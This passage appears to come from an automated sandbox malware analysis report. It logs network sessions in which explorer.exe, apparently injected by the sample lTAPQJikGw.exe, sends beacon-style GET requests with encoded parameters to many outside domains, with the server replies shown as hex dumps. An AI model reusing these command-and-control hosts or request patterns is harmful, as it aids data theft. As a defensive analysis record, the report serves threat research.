5f 64 6f 77 6e 2e 67 69 66 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 20 30 3b 20 7d 0a 2e 73 75 62 5f 62 6f 74 74 6f 6d 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 69 6e 68 65 72 69 74 20 7d 0a 2e 63 62 6c 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 69 6e 68 65 72 69 74 20 7d 0a 2e 63 62 72 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 69 6e 68 65 72 69 74 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 31 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 20 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 69 66 20 28 77 69 6e 64 6f 77 2e 74 6f
                                                                      Data Ascii: 1534<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>Welcome cmannouncements.com - Hostmonster.com</title><link href="//www.hostmonster.com/media/shared/info/index/_hm/home.css" rel="stylesheet" type="text/css"><link href="//www.hostmonster.com/media/shared/general/_hm/homestyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="//www.hostmonster.com/media/shared/general/_hm/home.js"></script><style type="text/css">.rollover a { display:block; height:27px;width:140px; background: url('//www.hostmonster.com/media/shared/general/_hm/cplogin.gif') no-repeat 0 0;} .rollover a:hover { background: url('//www.hostmonster.com/media/shared/general/_hm/cplogin_down.gif') no-repeat 0 0; }.sub_bottom { background: inherit }.cbl { background: inherit }.cbr { background: inherit }</style><meta name="revisit-after" content="10"><meta name="ROBOTS" content="NOINDEX, NOFOLLOW"> </head><body><script type="text/javascript"> if (window.to
                                                                      Jun 10, 2021 18:08:06.724936008 CEST4972INData Raw: 70 20 21 3d 3d 20 77 69 6e 64 6f 77 2e 73 65 6c 66 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 20 3d 20 22 22 3b 77 69 6e 64 6f 77 2e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 20 3d 20 77 69 6e 64 6f 77 2e 73 65 6c 66 2e 6c 6f 63 61 74 69 6f 6e
                                                                      Data Ascii: p !== window.self) {document.write = "";window.top.location = window.self.location; setTimeout(function(){document.body.innerHTML='';},1);window.self.onload=function(evt){document.body.innerHTML='';};} </script><table width="1063" border="0"
                                                                      Jun 10, 2021 18:08:06.724961042 CEST4974INData Raw: 65 72 2e 67 69 66 22 20 77 69 64 74 68 3d 22 31 22 20 68 65 69 67 68 74 3d 22 31 31 22 3e 3c 2f 74 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20
                                                                      Data Ascii: er.gif" width="1" height="11"></td> </tr> <tr> <td align=right style="border-bottom: 1px solid #999; border-right: 1px solid #999; padding: 5px;background-color: white;"><a href='http://www.hostmo
                                                                      Jun 10, 2021 18:08:06.724983931 CEST4975INData Raw: 73 2e 63 6f 6d 2f 67 61 2e 6a 73 27 3e 3c 2f 73 63 72 22 2b 22 69 70 74 3e 22 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 76 61 72 20 70 61 67 65 54 72 61 63 6b 65 72 20 3d 20 5f 67 61 74 2e 5f 67 65 74 54 72 61
                                                                      Data Ascii: s.com/ga.js'></scr"+"ipt>");</script><script> var pageTracker = _gat._getTracker("UA-9156498-2"); pageTracker._initData(); pageTracker._trackPageview("/parked/[% parked_type %]/cmannouncements.com/[% request_uri %]");</script>
                                                                      Jun 10, 2021 18:08:06.724999905 CEST4975INData Raw: 6f 6e 73 74 65 72 2e 63 6f 6d 2f 63 67 69 2f 73 69 67 6e 75 70 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 44 6f 6d 61 69 6e 20 43 68 65 63 6b 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65
                                                                      Data Ascii: onster.com/cgi/signup" rel="nofollow">Domain Check</a></li> <li><a href="http://www.hostmonster.com/cgi-bin/partner" rel="nofollow">Affiliates</a></li> <li><a href="http://www.hostmonster.com/cgi/terms" rel="nofollow">T


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      3192.168.2.449766172.107.55.680C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 10, 2021 18:08:11.821222067 CEST4976OUTGET /p2io/?CFQHg=Z8FkwwkqwMcbR63JqM/eMJCTIQtJD+6S4GLVkEvBdcKRRdmUAPmyd56itTHHstyDZ3vx&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.leonardocarrillo.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:12.061254978 CEST4977INHTTP/1.1 301 Moved Permanently
                                                                      Server: nginx
                                                                      Date: Thu, 10 Jun 2021 16:08:28 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      X-Powered-By: PHP/7.3.20
                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                      Location: http://leonardocarrillo.com/p2io/?CFQHg=Z8FkwwkqwMcbR63JqM/eMJCTIQtJD+6S4GLVkEvBdcKRRdmUAPmyd56itTHHstyDZ3vx&Pr980v=G2MtWNVHS
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      4192.168.2.44976754.69.66.22780C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 10, 2021 18:08:17.525732040 CEST4978OUTGET /p2io/?CFQHg=H0m9fF/5FM7UqIICC4653EpAABAppk+gPAvqYefbAICNl1a1FFJvvx6E9HTJL6Hcfv3l&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.dreamcashbuyers.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:17.743844032 CEST4978INHTTP/1.1 301 Moved Permanently
                                                                      Location: https://www.dreamcashbuyers.com/p2io/?CFQHg=H0m9fF/5FM7UqIICC4653EpAABAppk+gPAvqYefbAICNl1a1FFJvvx6E9HTJL6Hcfv3l&Pr980v=G2MtWNVHS
                                                                      Date: Thu, 10 Jun 2021 16:08:17 GMT
                                                                      Content-Length: 0
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      5192.168.2.449768199.195.117.14780C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 10, 2021 18:08:23.084971905 CEST4979OUTGET /p2io/?CFQHg=0YkKA47wwnQsSd2I7kPMKR9IRaKfA7HvmAjNs5nkCsbL4/Nj4Thso/t2FfIp2mnBj9Pa&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.swayam-moj.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:23.239788055 CEST4980INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 10 Jun 2021 16:08:23 GMT
                                                                      Server: Apache/2.4.48 (cPanel) OpenSSL/1.1.1k mod_bwlimited/1.4
                                                                      Content-Length: 315
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      6192.168.2.449769156.241.53.16180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 10, 2021 18:08:28.563146114 CEST4981OUTGET /p2io/?CFQHg=DTtQlm+bkwamRHt6VrobrkMYYvpq+NlfspH3ROyN3o99G08d4+CoiJMc5PUrO1w4I+TP&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.hfjxhs.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:29.303756952 CEST4991INHTTP/1.1 302 Moved Temporarily
                                                                      Date: Thu, 10 Jun 2021 16:08:28 GMT
                                                                      Server: Apache
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                      Pragma: no-cache
                                                                      Set-Cookie: PHPSESSID=8guk2q7o041l5h2cg3f0fssdf2; path=/
                                                                      Upgrade: h2
                                                                      Connection: Upgrade, close
                                                                      Location: /
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=gbk


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      7192.168.2.44977299.83.154.11880C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 10, 2021 18:08:34.334511042 CEST5001OUTGET /p2io/?CFQHg=lrOqxb+RJFhwpubsYZ1tkMjkgx31NOkXgmE0j6vPa760pj23uu3lC+ndsaG2+azAf30S&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.defenestration.world
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:34.522964954 CEST5001INHTTP/1.1 403 Forbidden
                                                                      Date: Thu, 10 Jun 2021 16:08:34 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 146
                                                                      Connection: close
                                                                      Server: nginx
                                                                      Vary: Accept-Encoding
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      8192.168.2.449773198.54.117.21680C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 10, 2021 18:08:39.800529003 CEST5003OUTGET /p2io/?CFQHg=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.boogerstv.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      9192.168.2.449774198.185.159.14480C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jun 10, 2021 18:08:45.237778902 CEST5004OUTGET /p2io/?CFQHg=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7MooJpxvMOcw&Pr980v=G2MtWNVHS HTTP/1.1
                                                                      Host: www.totally-seo.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jun 10, 2021 18:08:45.409755945 CEST5005INHTTP/1.1 400 Bad Request
                                                                      Cache-Control: no-cache, must-revalidate
                                                                      Content-Length: 77564
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Date: Thu, 10 Jun 2021 16:08:45 UTC
                                                                      Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                      Pragma: no-cache
                                                                      Server: Squarespace
                                                                      X-Contextid: SVwprJ2l/84MWoE3z
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                      Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
                                                                      Jun 10, 2021 18:08:45.409797907 CEST5007INData Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20
                                                                      Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
                                                                      Jun 10, 2021 18:08:45.409826040 CEST5008INData Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34
                                                                      Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
                                                                      Jun 10, 2021 18:08:45.409846067 CEST5008INData Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75
                                                                      Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
                                                                      Jun 10, 2021 18:08:45.409871101 CEST5010INData Raw: 64 57 72 56 38 34 7a 76 71 7a 55 70 39 38 37 66 66 4f 71 71 2b 70 6a 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a
                                                                      Data Ascii: dWrV84zvqzUp987ffOqq+pj4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS
                                                                      Jun 10, 2021 18:08:45.409894943 CEST5011INData Raw: 73 55 74 73 78 4c 45 35 68 38 53 70 70 4e 4d 66 78 35 69 6a 57 48 70 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a
                                                                      Data Ascii: sUtsxLE5h8SppNMfx5ijWHpb3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFI
                                                                      Jun 10, 2021 18:08:45.409918070 CEST5012INData Raw: 6a 66 69 63 35 33 53 6e 75 34 72 53 74 2b 48 74 59 6a 2b 4a 76 41 47 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77
                                                                      Data Ascii: jfic53Snu4rSt+HtYj+JvAGJIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2u
                                                                      Jun 10, 2021 18:08:45.409940004 CEST5013INData Raw: 49 73 56 6e 48 51 76 47 66 48 4a 59 2b 47 73 46 4f 76 65 49 61 4c 6b 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79
                                                                      Data Ascii: IsVnHQvGfHJY+GsFOveIaLkZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3
                                                                      Jun 10, 2021 18:08:45.409962893 CEST5015INData Raw: 62 61 4b 64 68 59 6b 30 71 76 4f 51 56 49 71 79 6b 70 38 72 73 6c 57 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53
                                                                      Data Ascii: baKdhYk0qvOQVIqykp8rslWKKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOY
                                                                      Jun 10, 2021 18:08:45.409986973 CEST5016INData Raw: 50 33 55 43 44 61 59 67 2f 34 41 2f 4a 38 2b 65 6d 71 41 74 30 47 53 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73
                                                                      Data Ascii: P3UCDaYg/4A/J8+emqAt0GSW9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBW
                                                                      Jun 10, 2021 18:08:45.544152975 CEST5018INData Raw: 39 79 46 49 39 70 49 64 59 71 59 66 31 4d 41 4e 36 52 49 2b 77 53 49 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37
                                                                      Data Ascii: 9yFI9pIdYqYf1MAN6RI+wSI/qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMf


                                                                      Code Manipulations

                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      Analysis Process: lTAPQJikGw.exe PID: 7056 Parent PID: 5976

                                                                      General

                                                                      Start time:18:06:48
                                                                      Start date:10/06/2021
                                                                      Path:C:\Users\user\Desktop\lTAPQJikGw.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\lTAPQJikGw.exe'
                                                                      Imagebase:0xec0000
                                                                      File size:865792 bytes
                                                                      MD5 hash:16657FA097CD334973A5489EEFF8BAFE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
